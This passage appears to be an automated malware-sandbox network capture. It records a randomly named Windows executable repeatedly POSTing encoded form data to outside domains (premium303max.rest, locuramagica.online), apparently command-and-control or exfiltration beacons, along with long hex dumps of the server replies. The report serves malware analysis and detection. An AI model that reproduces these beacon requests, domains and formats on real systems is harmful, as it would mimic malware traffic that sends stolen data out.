                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 41 61 6b 55 37 41 44 71 69 4f 36 38 68 52 65 67 78 31 48 30 53 45 42 46 36 4f 57 71 44 4f 39 73 62 38 65 70 48 43 55 77 4d 4d 55 4c 6c 37 30 4f 57 43 54 79 46 6e 79 32 4d 75 37 75 4c 6b 6b 30 59 6b 36 30 4f 47 33 79 6f 51 5a 50 41 66 70 74 2f 51 68 79 35 38 7a 6a 34 30 56 67 68 33 62 70 31 44 75 65 30 68 53 63 4e 6a 47 36 55 75 75 76 39 45 51 44 48 70 79 7a 54 6c 42 44 65 6f 50 57 47 41 4d 58 72 72 54 74 66 35 43 58 76 6d 6b 69 45 47 51 30 30 48 75 69 6a 68 45 71 6c 34 73 68 78 79 4e 73 79 78 38 58 5a 37 6f 49 4b 34 74 2b 57 4d 53 57 41 52 68 6a 46 38 57 7a 57 6d 51 65 77 33 61 41 67 58 38 3d
                                                                            Data Ascii: UTJ0bhC=AakU7ADqiO68hRegx1H0SEBF6OWqDO9sb8epHCUwMMULl70OWCTyFny2Mu7uLkk0Yk60OG3yoQZPAfpt/Qhy58zj40Vgh3bp1Due0hScNjG6Uuuv9EQDHpyzTlBDeoPWGAMXrrTtf5CXvmkiEGQ00HuijhEql4shxyNsyx8XZ7oIK4t+WMSWARhjF8WzWmQew3aAgX8=
                                                                            Dec 10, 2024 16:26:40.405989885 CET399INHTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:40 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.55001245.79.252.94801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:41.828942060 CET823OUTPOST /p39a/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 41 61 6b 55 37 41 44 71 69 4f 36 38 67 78 75 67 77 53 37 30 44 6b 42 47 6a 2b 57 71 4a 75 39 6f 62 38 53 70 48 48 6b 61 4d 35 38 4c 6c 62 6b 4f 58 44 54 79 4c 48 79 32 44 4f 37 72 49 55 6b 37 59 6b 32 47 4f 45 6a 79 6f 54 6c 50 41 64 68 74 2b 6e 4e 78 34 73 7a 68 74 6b 56 69 75 58 62 70 31 44 75 65 30 67 79 32 4e 6a 65 36 49 4f 2b 76 73 56 51 43 4e 4a 79 77 43 6c 42 44 61 6f 50 53 47 41 4d 68 72 76 4c 4c 66 39 79 58 76 6d 55 69 46 58 51 7a 2b 48 75 37 6e 68 45 36 69 4e 42 45 39 44 78 75 79 67 42 50 5a 74 63 46 47 75 63 55 4d 75 61 2b 54 78 4e 62 56 76 65 45 48 57 78 33 71 55 4b 77 2b 41 71 51 45 4d 69 6f 38 53 54 59 77 32 34 6b 67 72 2b 6a 49 45 4a 4c
                                                                            Data Ascii: UTJ0bhC=AakU7ADqiO68gxugwS70DkBGj+WqJu9ob8SpHHkaM58LlbkOXDTyLHy2DO7rIUk7Yk2GOEjyoTlPAdht+nNx4szhtkViuXbp1Due0gy2Nje6IO+vsVQCNJywClBDaoPSGAMhrvLLf9yXvmUiFXQz+Hu7nhE6iNBE9DxuygBPZtcFGucUMua+TxNbVveEHWx3qUKw+AqQEMio8STYw24kgr+jIEJL
                                                                            Dec 10, 2024 16:26:43.018282890 CET399INHTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:42 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            39192.168.2.55001345.79.252.94801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:44.484082937 CET1840OUTPOST /p39a/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 41 61 6b 55 37 41 44 71 69 4f 36 38 67 78 75 67 77 53 37 30 44 6b 42 47 6a 2b 57 71 4a 75 39 6f 62 38 53 70 48 48 6b 61 4d 35 6b 4c 69 70 63 4f 57 68 37 79 49 48 79 32 64 2b 37 71 49 55 6b 63 59 6b 2b 43 4f 45 75 48 6f 56 70 50 43 2b 35 74 35 56 31 78 78 73 7a 68 76 6b 56 2f 68 33 61 30 31 44 2b 61 30 67 43 32 4e 6a 65 36 49 4d 57 76 38 30 51 43 43 70 79 7a 54 6c 42 66 65 6f 50 71 47 45 59 78 72 76 65 77 66 4d 4f 58 76 43 77 69 47 6c 49 7a 6b 48 75 75 71 42 46 6c 69 4e 46 58 39 44 74 45 79 67 31 6c 5a 71 6f 46 44 6f 70 59 51 2b 6d 57 41 33 51 35 59 66 53 64 57 78 35 77 6a 33 32 43 33 52 79 74 4c 76 53 45 7a 79 2f 36 32 55 46 36 69 61 32 31 43 78 77 63 39 2b 2b 77 55 39 5a 53 74 79 58 36 6a 31 66 4d 6b 4b 2b 50 2b 76 51 6c 76 38 42 6f 30 6d 64 66 77 77 71 4c 7a 6b 45 74 56 70 57 4b 78 6e 65 4e 73 58 42 39 4b 56 43 77 31 67 46 68 64 68 52 64 73 4d 43 57 5a 4b 36 49 6a 54 73 58 69 75 75 44 57 79 78 62 4c 33 4e 73 53 43 73 31 61 76 51 46 73 35 5a 53 51 68 2f 32 4f 39 4f 7a 56 47 [TRUNCATED]
                                                                            Data Ascii: UTJ0bhC=AakU7ADqiO68gxugwS70DkBGj+WqJu9ob8SpHHkaM5kLipcOWh7yIHy2d+7qIUkcYk+COEuHoVpPC+5t5V1xxszhvkV/h3a01D+a0gC2Nje6IMWv80QCCpyzTlBfeoPqGEYxrvewfMOXvCwiGlIzkHuuqBFliNFX9DtEyg1lZqoFDopYQ+mWA3Q5YfSdWx5wj32C3RytLvSEzy/62UF6ia21Cxwc9++wU9ZStyX6j1fMkK+P+vQlv8Bo0mdfwwqLzkEtVpWKxneNsXB9KVCw1gFhdhRdsMCWZK6IjTsXiuuDWyxbL3NsSCs1avQFs5ZSQh/2O9OzVGz7r+Ibueuq48CIOhFU8rCLCWejgA2V9S2JfIHUlgMD/88gUd5v0Nvxh2R1kQs9Y0acgdaVn2MET/PMikB9Mr7eZI1SJDA1u+FUJ3pvk5qFa55bpqXg5GoxXcsus3hoJxJrKIIF7HwSqYhhg1sZGh39mXNn6k6yVhj6R6ael+YFxCVkV3AbUXJESnOGQbO0VzkmysUu1xdGrmJelFyAPobeqm61qxdxL6nrtNLkiD74HkjzyAYgVrSTVu0DBn+7C24ZfBqjoGSA5qUiQ6Vvi/0RKWcgGh5W2FzQhZzPnS+kQ9ADZZCduj+6PKglII3zUN7rwggRf+2it4S7+TI4KRYFWQEmDRyBQwBe1jfWlzStBsEufx+J1ISEaa3FpeI3u8ytKDaCTOwMLHmgxaAYkDeIg3elYsneF4DgO/kguXbx7/8xf67l/217pP0YH1QD4sBQvaCW8UbcxvcUGpwsEcbkvZ0c7k2MO285LSXXtmbiqJhJRG0gMKP1QJ1JWYo39eQxSVT87oTEITFStlWKOiDMyHh8fxVuNuMz/Hs8wfP72kxx9s+0YIx+nNAvO1gy5wfRvee3E9BJ2VH8F75ORpv1gyAblmvHYyx5SKpM8Ukjz/mkALI3QkwBsPFS78124BNpCj0f7N5uuoFMRjQVaIidz7KmuFpDWsPc [TRUNCATED]
                                                                            Dec 10, 2024 16:26:45.675806999 CET399INHTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:45 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            40192.168.2.55001445.79.252.94801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:26:47.138627052 CET538OUTGET /p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.premium303max.rest
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Dec 10, 2024 16:26:48.335143089 CET551INHTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:48 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg==
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            41192.168.2.55001531.31.198.145801400C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:27:02.812504053 CET806OUTPOST /rls3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.locuramagica.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.locuramagica.online
                                                                            Referer: http://www.locuramagica.online/rls3/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 74 6c 44 4d 54 43 5a 49 48 39 77 5a 68 50 54 50 59 4d 55 35 71 72 63 50 2f 44 57 79 6c 58 31 76 51 70 79 43 45 50 6e 79 4d 38 48 6d 32 77 5a 56 71 32 48 30 78 2f 45 52 58 77 70 31 62 6b 63 78 4a 41 4f 62 41 56 48 69 69 52 5a 73 47 6e 2f 70 33 37 57 51 78 35 31 5a 62 58 6e 6d 35 31 45 65 61 64 58 46 43 39 41 76 43 2b 61 46 79 73 74 33 6b 64 38 4c 62 32 33 77 4e 30 4b 43 47 64 32 62 52 49 48 67 36 2f 45 4c 59 4f 79 75 54 53 79 70 4a 65 4a 65 61 68 44 62 58 48 4f 55 43 77 65 44 7a 30 70 55 59 73 52 45 6c 57 6f 57 68 46 6b 62 5a 79 41 46 4f 52 5a 50 55 7a 32 69 49 50 69 36 39 51 38 44 34 6c 67 3d
                                                                            Data Ascii: UTJ0bhC=tlDMTCZIH9wZhPTPYMU5qrcP/DWylX1vQpyCEPnyM8Hm2wZVq2H0x/ERXwp1bkcxJAObAVHiiRZsGn/p37WQx51ZbXnm51EeadXFC9AvC+aFyst3kd8Lb23wN0KCGd2bRIHg6/ELYOyuTSypJeJeahDbXHOUCweDz0pUYsRElWoWhFkbZyAFORZPUz2iIPi69Q8D4lg=
                                                                            Dec 10, 2024 16:27:03.925805092 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 10 Dec 2024 15:27:03 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 29 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
                                                                            Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrv)*trnx71feFg4<`:yvN`:PK}nZ3s@~pcaan8P*|o?W.sp_3Zfge-C}{77A::3g;7V|c173>7|f9+xoxy!HUY"_~iksuvm>5McT+|Xda1[9,\{rdLDAz:*&$?Nu1h+087YSD0f<[Fi53:?3}{9>0}3bV0`-U6`tnQL7)EDpA,lnqsN/[$eP`>Bw,z@pnRTlX;9a pn6ADY;@3%0kL'~pw Wo]Ym*kKq-D2}E%kd6AK\-\`9;!;jU/$8X<K*[IGLU2^>MNH_7&bW1((K3e]<cRDFxZYnWh|Z"r`zc)<8 [TRUNCATED]
                                                                            Dec 10, 2024 16:27:03.925899029 CET224INData Raw: 64 9b d6 78 02 a9 6d 27 53 8d 46 ad 6b 4c 3a 99 a4 43 df 63 e0 07 06 98 29 61 13 47 c2 1e 13 55 63 f8 89 d8 44 d3 5b 7a f8 6a 42 22 1b e4 07 b1 c5 6c 30 77 07 84 2b 03 04 4f 05 7e 17 e1 31 f8 d8 0c 89 6d ba ce 40 54 29 e8 c6 e4 b2 41 2d 12 99 0c
                                                                            Data Ascii: dxm'SFkL:Cc)aGUcD[zjB"l0w+O~1m@T)A-IPcfJKpPJ%kMj)dB3u=Y(!0?9s=xYXRcD]=az2rb(o=k,R~=t`;W
                                                                            Dec 10, 2024 16:27:03.925909996 CET1236INData Raw: 73 77 93 b6 8b 48 3d 1c 46 25 f5 08 ab ca 9c 1b 40 73 a6 b5 ea ae b2 0e 48 dc 1c 7c e8 5b bf 9b 60 df fe b6 f1 43 ff 6b b0 f2 2b 9e 94 de ad a0 67 42 89 da 78 3e 50 b5 76 2d 24 a0 ae 68 d8 f1 21 17 86 0a fe 57 68 7d 8d 18 4c 8c 45 7a 22 26 96 cd
                                                                            Data Ascii: swH=F%@sH|[`Ck+gBx>Pv-$h!Wh}LEz"&tf7I|9-E9i6:F!raAyrN{SJ:]w')jiV]w7T~$cM]npglBX7r6^!Q)
                                                                            Dec 10, 2024 16:27:03.926188946 CET1236INData Raw: d3 b6 dd bb e4 64 65 47 e8 80 29 df c1 a3 f4 b9 ac 5b ea 3c df da c0 75 ed c0 5a 27 04 6b a6 20 c4 65 ae d6 9e bb 72 f1 1c b6 7f 35 37 fd 99 67 ad 49 1a 88 03 69 95 5d 3b 81 ea d1 a3 b9 27 b5 19 47 4d f7 12 1d bb 39 2f e7 ad 9f fe bc 35 e6 43 08
                                                                            Data Ascii: deG)[<uZ'k er57gIi];'GM9/5C$-D1cK {A!p$:C>ioiuRCL4J3#RIE-"@gER()N3ax+CZZ<6r9)Pxy0iHrRRZ?Kl(Cpft
                                                                            Dec 10, 2024 16:27:03.926498890 CET1236INData Raw: 40 91 a6 e7 f3 00 76 2b 6e 46 e3 3f 43 d4 73 d9 fd ad 7b 2a 6f 60 17 a8 7a 4e 6b bf 75 5f 45 e6 75 9a aa 67 b3 f1 5b 6b 88 bc 31 5d a0 ea 39 2d fb c6 13 53 68 87 33 18 52 4c f6 7c 86 19 cf 6c ca 17 db f2 6c 56 fc 6e 53 8e cd 80 07 92 4a 6c f7 7d
                                                                            Data Ascii: @v+nF?Cs{*o`zNku_Eug[k1]9-Sh3RL|llVnSJl}iMzlu@3;c3$=If&}'7Kb7wI_h;9hN)z.~'-M"MgV&}2[TUbOoWtAjUi>0Mb[mBmL
                                                                            Dec 10, 2024 16:27:03.926512003 CET1236INData Raw: ac ae fd 6a 79 f8 d3 8e 8a 9b 75 69 b5 77 55 d5 36 6b 9c 15 4a eb 7c 5f 55 e7 77 17 bc b7 92 1a a2 d0 fd 5c e7 de da bf cf c6 72 2d 9f bf 73 bf bf 6c a3 95 d8 ab d9 69 2e 3b 8b a5 5c ec f4 9c 25 e4 e7 35 cb b1 70 fe 60 d2 24 11 06 fa ee 2a c7 1d
                                                                            Data Ascii: jyuiwU6kJ|_Uw\r-sli.;\%5p`$*`Z~f0Fc\my10FqFf_`kYkQx#wN'g?2<&B=@q{ni_S70_m@+\-A>aa>Z=fC_J
                                                                            Dec 10, 2024 16:27:03.926532030 CET1236INData Raw: 04 7f 18 f6 a0 4d 95 e3 4e 63 93 8f 01 fc 71 78 53 05 9d 9d 35 25 81 36 59 db 23 be 99 18 24 ab f9 71 cd b5 d5 fc b8 e6 5a 11 fe 21 cd b5 34 f4 e7 34 d7 2a 7b e9 30 e6 da f1 3a a9 02 fc 01 cd 35 96 2e 3a be b9 b6 9a 33 99 6b 99 7e 3c aa b9 c6 d8
                                                                            Data Ascii: MNcqxS5%6Y#$qZ!44*{0:5.:3k~<0Xz<\;6OA'ce([wotVsA2J429v,TAoeX$v5iTOaUauRk,]t|{a2xT{K`n%L^;6OA'ce([wo
                                                                            Dec 10, 2024 16:27:03.927342892 CET552INData Raw: 1c b8 eb 30 6f a0 52 87 bc 68 b6 55 27 56 ae 04 10 d9 39 c0 55 6b 61 91 b7 7e cd cc a5 6b cf 31 f3 26 49 ed ce b4 a6 9f 63 4b 6d 62 a6 c6 cb da 4d 80 e7 89 c5 f7 d8 70 b9 7b f8 8a 95 dd ef 67 aa e8 cb b4 88 40 d7 25 2f 92 c8 63 26 58 4a 7a 36 eb
                                                                            Data Ascii: 0oRhU'V9Uka~k1&IcKmbMp{g@%/c&XJz6(o#+"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJF
                                                                            Dec 10, 2024 16:27:03.927364111 CET1236INData Raw: 87 6f 34 c6 a5 e3 ec af 2f ed 9d 1f 99 bf b3 af fe f0 c1 bc 5f 78 c6 ca f4 3b 2b 90 ff ef 6c 77 33 f7 1f 84 af d3 73 54 3c 04 c0 a0 b8 bd eb c8 ea d7 db c0 2d 2d 30 10 05 35 2c b1 cd 43 b6 82 7b 46 e8 1c b5 52 38 3a 91 77 e8 af 8e 2c df 2e 77 e3
                                                                            Data Ascii: o4/_x;+lw3sT<--05,C{FR8:w,.wK^t+YaV7y$0_;63B:W$;7cBUg+{o&XFwCeYz$Q{;_yZzrvvwwI W_/CUEMc5y&
                                                                            Dec 10, 2024 16:27:03.927381039 CET1236INData Raw: 58 21 2f 56 c8 8b 15 f2 62 85 b4 b0 42 b8 fc 16 c0 70 db 44 bc 91 91 db 6b aa d5 46 42 32 d5 2a b2 bc df 54 4b c2 a1 70 99 0a d6 d8 08 d2 ff d9 11 1f 84 af 25 95 93 14 f8 7c 40 d8 13 a0 f1 5a be 1e cf ae b7 92 9a be b9 58 cc 66 82 9c 89 f8 44 40
                                                                            Data Ascii: X!/VbBpDkFB2*TKp%|@ZXfD@$DQF 22,kpWKpn|!M\d;(c*)(1(!3smLQjU{7Ku@I,OQT&\;U?\0S#(U\Zq0wjO"7Udnyf/:
                                                                            Dec 10, 2024 16:27:04.045502901 CET1236INData Raw: bd 98 b4 6e 3e 92 ff 56 e0 e7 8b ff f6 09 f9 ec 05 b9 ac eb d6 5a b6 a4 29 2f ef f3 72 69 ff b2 fa bc b5 b4 57 47 74 f7 e8 f3 7c 44 77 fc df af cf 51 b9 f3 ca 50 7d 86 75 a5 b2 71 fe f4 ba bd 9d b0 d7 76 f9 e7 be 70 f3 a5 0e f3 96 94 7f 56 7d fe
                                                                            Data Ascii: n>VZ)/riWGt|DwQP}uqvpV}qaKN1@vK]-4:]]EkfkfrJuWpw_<YweHd3d'ICC@>yD@d{@vhi0h*NQP\aT>v


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            42192.168.2.55001631.31.198.14580
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 10, 2024 16:27:06.158276081 CET826OUTPOST /rls3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.locuramagica.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.locuramagica.online
                                                                            Referer: http://www.locuramagica.online/rls3/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Raw: 55 54 4a 30 62 68 43 3d 74 6c 44 4d 54 43 5a 49 48 39 77 5a 68 76 6a 50 61 72 67 35 73 4c 63 49 6d 6a 57 79 73 33 31 72 51 75 36 43 45 4b 66 69 4d 4f 7a 6d 33 51 4a 56 72 79 72 30 32 2f 45 52 50 67 70 73 45 30 64 7a 4a 41 43 54 41 51 6e 69 69 56 78 73 47 6c 6e 70 33 49 2b 66 6a 5a 31 62 54 33 6e 6b 33 56 45 65 61 64 58 46 43 39 55 46 43 36 32 46 79 64 64 33 6e 34 63 55 45 47 33 7a 61 45 4b 43 43 64 32 66 52 49 47 50 36 39 78 6d 59 4e 61 75 54 53 43 70 49 50 4a 66 54 68 44 56 61 6e 50 46 4c 69 43 4e 31 47 56 46 56 4d 67 73 38 46 38 35 70 54 56 78 44 51 49 74 64 78 31 33 45 67 2b 56 5a 2f 44 54 6e 7a 73 7a 6d 79 32 61 6c 47 63 59 51 4c 52 47 57 48 77 4a 32 63 49 38 79 75 4c 5a
                                                                            Data Ascii: UTJ0bhC=tlDMTCZIH9wZhvjParg5sLcImjWys31rQu6CEKfiMOzm3QJVryr02/ERPgpsE0dzJACTAQniiVxsGlnp3I+fjZ1bT3nk3VEeadXFC9UFC62Fydd3n4cUEG3zaEKCCd2fRIGP69xmYNauTSCpIPJfThDVanPFLiCN1GVFVMgs8F85pTVxDQItdx13Eg+VZ/DTnzszmy2alGcYQLRGWHwJ2cI8yuLZ
                                                                            Dec 10, 2024 16:27:07.551311016 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 10 Dec 2024 15:27:07 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 29 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a [TRUNCATED]
